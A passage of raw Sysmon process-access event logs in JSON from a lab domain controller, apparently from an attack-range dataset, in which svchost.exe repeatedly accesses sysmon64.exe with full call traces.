C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5221,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5222,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5223,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5224,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5225,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5226,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5227,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5228,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 